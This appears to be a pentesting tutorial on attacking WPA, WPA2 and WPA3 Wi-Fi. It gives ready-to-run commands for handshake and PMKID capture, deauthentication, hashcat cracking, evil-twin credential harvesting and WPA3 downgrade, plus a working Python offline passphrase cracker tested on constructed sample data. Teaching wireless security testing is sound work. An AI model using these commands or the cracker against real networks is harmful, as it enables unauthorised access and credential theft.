WPA/WPA2/WPA3 Attacks

WPA, WPA2, and WPA3 are the core security standards that protect modern Wi-Fi networks. Each generation introduces stronger encryption and authentication methods, but each also exposes different weaknesses and attack surfaces that pentesters can exploit. Understanding how these protocols operate and how to attack them is essential for effective wireless pentesting.

How WPA/WPA2/WPA3 Work

All three standards derive per-session keys from a shared passphrase (PSK) or an EAP/RADIUS login and then encrypt frames with those keys; what differs is the cipher and the key exchange:

  • WPA uses TKIP, an RC4-based stopgap designed for WEP-era hardware (deprecated).

  • WPA2 uses CCMP (AES-CCM), the current baseline; keys come from the PSK or the EAP master key via the 4-way handshake.

  • WPA3 keeps CCMP (GCMP-256 in 192-bit Enterprise mode) but replaces the PSK handshake with SAE (Dragonfly), a password-authenticated key exchange that gives forward secrecy and turns every password guess into a live exchange with the AP, so a captured exchange cannot be cracked offline.

The strength of these protections depends heavily on implementation quality and, for the PSK modes, on the passphrase.

WPA Attacks (TKIP-Based)

WPA is an outdated protocol that still appears in older routers and IoT devices.

Common Weaknesses

  • TKIP wraps RC4 with a per-packet key and a weak MIC (Michael); the Beck–Tews attack decrypts short frames such as ARP and injects a handful of forged ones

  • Replay counters are kept per QoS queue on WMM networks, which the same attack abuses to replay frames on an unused queue

  • Packet injection is therefore limited but possible

  • The PMK is still PBKDF2(passphrase, SSID), so a captured handshake is cracked with the same dictionary attack as WPA2-PSK

Capturing WPA Handshake

sudo airodump-ng wlan0mon -c <channel> --bssid <AP_MAC> -w capture

Forcing Reconnection (Handshake Capture)

sudo aireplay-ng --deauth 10 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

Without -c the deauthentication frames are broadcast to every station; targeting one client is quieter and more reliable. Either way airodump-ng must already be running on the same channel to record the reconnection.

Once captured, the handshake is cracked offline just like WPA2.

Cracking WPA

hcxpcapngtool -o hash.hc22000 capture-01.cap

hashcat -m 22000 hash.hc22000 wordlist.txt

Hashcat's old mode 2500 (.hccap/.hccapx input) is deprecated since version 6.0; mode 22000 accepts WPA (TKIP, HMAC-MD5 MIC) and WPA2 (CCMP, HMAC-SHA1 MIC) handshakes alike because both derive the PMK the same way. For cracking purposes WPA is WPA2-PSK with extra protocol weaknesses on top.

WPA2 Attacks (PSK-Based)

WPA2-PSK is the most common security standard in homes and small networks.
Its main weakness is password cracking after handshake capture.

Capturing WPA2 Handshake

sudo airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

Forcing a Handshake

sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon

Verifying Handshake

aircrack-ng capture-01.cap

airodump-ng appends a sequence number to the -w prefix, so the file is capture-01.cap, and the output should list the BSSID with "WPA (1 handshake)". Messages 1 and 2 of the 4-way handshake (the ANonce plus the client's MIC) are enough to crack; a full four-message capture is not required.

Cracking WPA2 Passwords (Offline)

Convert to Hashcat format:

hcxpcapngtool -o hash.hc22000 capture-01.cap

Crack:

hashcat -m 22000 hash.hc22000 wordlist.txt

WPA2-PSK security depends entirely on the passphrase: the attacker gets unlimited offline guesses, each costing one PBKDF2-SHA1 run of 4096 iterations, which a single modern GPU performs on the order of a million times per second. Only the length and randomness of the passphrase limit the attack.

PMKID-Based WPA2 Attacks

Many APs include the PMKID in the first message of the 4-way handshake (EAPOL M1), which they send as soon as any station associates. The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC); everything in it except the PMK is known, so the attacker associates with the AP, reads the PMKID out of M1, and cracks it like a handshake. No legitimate client and no deauth are needed.

Capturing PMKID

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

These options are those of hcxdumptool 5.x and 6.0–6.2; releases from 6.3 on renamed most flags, so check hcxdumptool --help for the installed version. hcxdumptool associates with the AP itself, so stop NetworkManager and wpa_supplicant on the interface before running it.

Extracting PMKID

hcxpcapngtool -o pmkid.22000 pmkid.pcapng

Cracking PMKID

hashcat -m 22000 pmkid.22000 wordlist.txt

hcxpcapngtool writes the 22000 format (lines starting WPA*01* for PMKIDs and WPA*02* for EAPOL handshakes); the older PMKID-only mode 16800 is deprecated and will not read this output. PMKID attacks are effective against networks with no clients, but only when the AP actually places a PMKID in M1; some firmware omits it or sends a zeroed value, in which case you fall back to a real handshake.
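The handshake cracking above and the PMKID attack reduce to the same computation, which is why hashcat's 22000 mode handles both. The following is an added example, not code from this page or from the hashcat/hcx projects, that re-implements that check in plain Python: PBKDF2 to the PMK, then either the PMKID HMAC or the PTK-derived KCK and EAPOL MIC (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP). The 22000 lines it cracks are constructed inside the script from a known passphrase; the MACs, nonces and SSID are made up, and the EAPOL frame is a minimal message 2 without the RSN IE.

```python
"""Offline WPA/WPA2-PSK cracking in plain Python, mirroring what hashcat -m 22000 does."""
import hashlib
import hmac
from typing import Iterable, Optional

# Byte offsets inside an EAPOL-Key frame (4-byte 802.1X header followed by the key descriptor).
KEY_INFO_OFF = 5   # 2-byte Key Information; low 3 bits of the second byte = descriptor version
NONCE_OFF = 17     # 32-byte Key Nonce (SNonce in message 2)
MIC_OFF = 81       # 16-byte Key MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). Identical for WPA and WPA2."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): no nonces, so no real client needed."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def kck_from_handshake(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = first 128 bits of PTK = PRF-512(PMK, "Pairwise key expansion", sorted MACs || sorted nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed; hash picked by descriptor version."""
    version = eapol[KEY_INFO_OFF + 1] & 0x07
    if version == 1:       # WPA (TKIP): HMAC-MD5
        digest = hashlib.md5
    elif version == 2:     # WPA2 (CCMP): HMAC-SHA1
        digest = hashlib.sha1
    else:
        raise ValueError("descriptor version 3 (AES-128-CMAC) is not handled by this example")
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_22000(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one hashcat 22000 line (all fields hex):
    WPA*01*PMKID*AP*STA*ESSID***  or  WPA*02*MIC*AP*STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a 22000 line")
    target, ap_mac, sta_mac, ssid = (bytes.fromhex(x) for x in f[2:6])
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:   # WPA passphrases are 8..63 characters; skip others cheaply
            continue
        pmk = pmk_from_passphrase(cand, ssid)
        if f[1] == "01":
            guess = pmkid(pmk, ap_mac, sta_mac)
        else:
            anonce, eapol = bytes.fromhex(f[6]), bytes.fromhex(f[7])
            snonce = eapol[NONCE_OFF:NONCE_OFF + 32]
            guess = eapol_mic(kck_from_handshake(pmk, ap_mac, sta_mac, anonce, snonce), eapol)
        if hmac.compare_digest(guess, target):
            return cand
    return None


def make_sample_lines(passphrase: str = "password123", ssid: bytes = b"TestNet", wpa2: bool = True):
    """CONSTRUCTED test data, not a real capture: a PMKID line and an EAPOL message-2 line for `passphrase`."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # made-up MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                          # made-up nonces
    pmk = pmk_from_passphrase(passphrase, ssid)
    # Minimal message 2: descriptor type, key info (MIC bit + version), key length, replay counter,
    # SNonce, IV/RSC/ID (zero), MIC placeholder, key-data length 0. Real frames also carry the RSN IE.
    key_info = b"\x01\x0a" if wpa2 else b"\x01\x09"
    body = (b"\x02" if wpa2 else b"\xfe") + key_info + b"\x00\x10" + b"\x00" * 8 + snonce \
        + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00"
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    mic = eapol_mic(kck_from_handshake(pmk, ap_mac, sta_mac, anonce, snonce), eapol)
    eapol = eapol[:MIC_OFF] + mic + eapol[MIC_OFF + 16:]
    essid = ssid.hex()
    pmkid_line = f"WPA*01*{pmkid(pmk, ap_mac, sta_mac).hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{essid}***"
    eapol_line = f"WPA*02*{mic.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{essid}*{anonce.hex()}*{eapol.hex()}*02"
    return pmkid_line, eapol_line


if __name__ == "__main__":
    wordlist = ["letmein", "qwerty123", "Summer2019", "password123"]
    for sample in make_sample_lines():
        print(sample[:24] + "...", "->", crack_22000(sample, wordlist))
```

Pure Python manages on the order of a thousand guesses per second here, because the 4096-round PBKDF2 dominates and nothing else in the check is expensive; hashcat on a GPU does exactly the same arithmetic orders of magnitude faster, which is the whole reason passphrase length and randomness matter.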

WPA2-Enterprise Attacks

WPA2-Enterprise uses RADIUS and EAP authentication.
It is secure if configured properly, but misconfigurations allow credential harvesting.

Step: Create an Evil Twin AP

Use hostapd-wpe or Bettercap to impersonate the real AP.

Starting Evil Twin with hostapd-wpe

sudo hostapd-wpe hostapd-wpe.conf

A client that does not validate the RADIUS server certificate (no CA pinned, no expected server name) completes the TLS tunnel with the fake AP and then runs its inner authentication against it, handing over:

  • Username (the outer identity, usually the real account name unless an anonymous identity is configured)

  • MSCHAPv2 challenge–response (PEAP or EAP-TTLS inner method)

  • Cleartext password when the inner method is EAP-GTC or PAP; hostapd-wpe can also try to negotiate EAP-GTC with clients that allow it

Supplicants without a pinned CA either show a certificate warning that users click through or accept the certificate silently; in both cases the attacker obtains authentication material.

Credentials Captured Can Be:

  • Cleartext (EAP-GTC, or PAP inside EAP-TTLS)

  • MSCHAPv2 challenge–response pairs, which hostapd-wpe prints in John (NETNTLM) and hashcat (-m 5500, NetNTLMv1) format

  • The NT hash behind that exchange: MSCHAPv2's DES keys are derived from it, so a crack yields either the password or the NT hash itself

These allow offline cracking (asleap or hashcat) and, with a recovered domain password or NT hash, lateral movement into the wired network.

WPA3 Attacks

WPA3-Personal uses SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange: every guess costs a live exchange with the AP, the exchange provides forward secrecy, and a captured one reveals nothing usable offline.
Attacks therefore target implementation flaws, the WPA2 transition mode, or client behaviour rather than the protocol itself.

WPA3 Weak Points

  • Downgrade to WPA2 (Transition Mode)

  • SAE side-channel leaks (Dragonblood vulnerabilities)

  • Misconfigured PMF

  • Evil Twin opportunities

Downgrade Attack (WPA3 → WPA2)

In WPA3 transition mode the AP serves WPA2-PSK and SAE on the same SSID with the same passphrase, so any WPA2 handshake for that network is a valid cracking target:

  1. Obtain a WPA2 4-way handshake. Either wait for (or deauth) a legacy client that only speaks WPA2, or run a rogue AP with the same SSID that advertises WPA2-PSK only: a WPA3-capable client that has not stored the network as SAE-only associates with it and starts the 4-way handshake (the Dragonblood downgrade).

  2. Capture messages 1 and 2. The rogue AP chooses the ANonce itself and the client's message 2 carries the MIC, so a complete handshake is unnecessary.

  3. Crack offline with hashcat -m 22000; the recovered passphrase is also the SAE password.

Testing Downgrade Behavior

sudo aireplay-ng --deauth 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

This only dislodges stations that associated with WPA2 and without PMF: an SAE association always uses PMF and ignores unprotected deauth frames. Those WPA2 clients rejoin with WPA2 and hand over a crackable handshake; a WPA3 client is downgraded only through the rogue WPA2-only AP.

Dragonblood Attacks

Dragonblood (Vanhoef and Ronen, 2019) showed that early SAE implementations leaked the password through timing and cache side channels in Dragonfly's "hunting and pecking" password-element derivation (worst with Brainpool curves and MODP groups), enough to mount an offline dictionary attack, alongside the transition-mode downgrade above.
hostapd/wpa_supplicant 2.8 and later carry the fixes, and the WPA3 specification added the hash-to-element (H2E) derivation to remove the side channel, but unpatched APs and IoT devices remain exposed.

WPA3-Personal vs WPA3-Enterprise

  • WPA3-Personal uses SAE

  • WPA3-Enterprise optionally adds a 192-bit mode (CNSA suite: EAP-TLS only, GCMP-256, SHA-384, P-384 or RSA 3072-bit and larger certificates)

Enterprise mode is extremely resistant to attacks unless EAP configuration errors exist; 192-bit mode drops the password-based inner methods entirely, so the evil-twin credential harvesting above does not apply to it.

Protected Management Frames (PMF)

PMF (802.11w) authenticates management frames that an attacker can otherwise forge freely:

  • Deauth frames

  • Disassociation frames

  • Robust action frames (unicast ones are encrypted, broadcast ones carry a BIP integrity check)

PMF Enabled Behavior

  • Unprotected deauth frames from aireplay-ng are ignored

  • Handshake forcing becomes difficult

  • Evil Twin attacks become harder, because clients cannot be kicked off the real AP

PMF is mandatory for SAE, but on WPA2 networks it is usually "optional" (hostapd ieee80211w=1), which protects only the clients that negotiate it; "required" (ieee80211w=2) is what actually stops deauth attacks against the whole cell.

Pentesters must use:

  • PMKID attacks

  • Downgrade attempts

  • Social engineering

  • Evil Twin with client-side misconfigurations

Evil Twin Attacks Across WPA Families

Evil Twin attacks remain effective when:

  • Victims ignore certificate warnings (WPA2-Enterprise)

  • PMF is disabled

  • Auto-connect behavior is enabled

  • Signal strength is stronger

Tools for Evil Twin:

sudo airbase-ng -e "TargetSSID" -c <channel> wlan0mon

or using Bettercap, which needs wifi.recon running and the SSID and channel set first:

set wifi.ap.ssid TargetSSID
set wifi.ap.channel <channel>
wifi.recon on
wifi.ap on

Evil Twin remains one of the most effective wireless attack techniques.

Why WPA/WPA2/WPA3 Attacks Matter

Wireless security depends heavily on:

  • Password strength

  • Configuration

  • Client behavior

  • Router implementation

Pentesters use these attacks to:

  • Evaluate password resilience

  • Identify downgrade vulnerabilities

  • Assess certificate validation behavior

  • Test user awareness

  • Reveal insecure Enterprise deployments

Each standard has unique weaknesses that must be understood before attempting exploitation.

Intel Dump

  • WPA attacks rely on handshake + offline cracking

  • WPA2 is vulnerable via PSK capture, PMKID, and weak passwords

  • WPA2-Enterprise vulnerable via Evil Twin and misconfigured EAP

  • WPA3 vulnerable via downgrade and early SAE flaws

  • PMF protects against deauth but not against misconfigured clients
